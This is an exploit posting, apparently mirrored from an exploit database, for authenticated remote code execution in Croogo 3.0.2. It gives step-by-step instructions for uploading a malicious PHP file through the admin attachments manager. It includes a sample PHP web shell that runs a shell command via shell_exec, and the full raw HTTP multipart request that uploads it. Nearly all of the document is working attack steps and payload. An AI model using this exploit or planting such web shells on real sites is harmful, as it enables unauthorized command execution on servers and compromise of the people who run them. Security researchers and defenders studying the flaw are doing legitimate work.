Exploit for Croogo 3.0.2 Remote Code Execution

Name: Exploit for Croogo 3.0.2 Remote Code Execution
Rating: 5 (205 reviews)
2021-12-06 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:165161
# Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)  
# Date: 05/12/2021  
# Exploit Author: Deha Berkin Bir  
# Vendor Homepage: https://croogo.org/  
# Software Link: https://downloads.croogo.org/v3.0.2.zip  
# Version: 3.0.2  
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3  
  
==> Tutorial <==  
  
1- Login with your privileged account.  
2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.  
3- Click the 'New Attachment' button.  
4- Choose a malicious php script and upload it.  
  
########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################  
<?php  
$command = shell_exec('netstat -an');  
echo "<pre>$command</pre>";  
?>  
############################################################################  
  
5- Click on the URL of malicious php script you uploaded.  
6- The malicious PHP script will be executed.  
  
  
==> HTTP Request (File Upload) <==  
  
POST /admin/file-manager/attachments/add HTTP/1.1  
Host: (HOST)  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694  
Content-Length: 976  
Origin: http://(HOST)  
Connection: close  
Referer: http://(HOST)/admin/file-manager/attachments/add  
Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------7028631106888453201670373694  
Content-Disposition: form-data; name="_method"  
  
POST  
-----------------------------7028631106888453201670373694  
Content-Disposition: form-data; name="_csrfToken"  
  
bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb  
-----------------------------7028631106888453201670373694  
Content-Disposition: form-data; name="file"; filename="malicious.php"  
Content-Type: application/octet-stream  
  
<?php  
$command = shell_exec('netstat -an');  
echo "<pre>$command</pre>";  
?>  
  
-----------------------------7028631106888453201670373694  
Content-Disposition: form-data; name="_Token[fields]"  
  
16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A  
-----------------------------7028631106888453201670373694  
Content-Disposition: form-data; name="_Token[unlocked]"  
  
  
-----------------------------7028631106888453201670373694--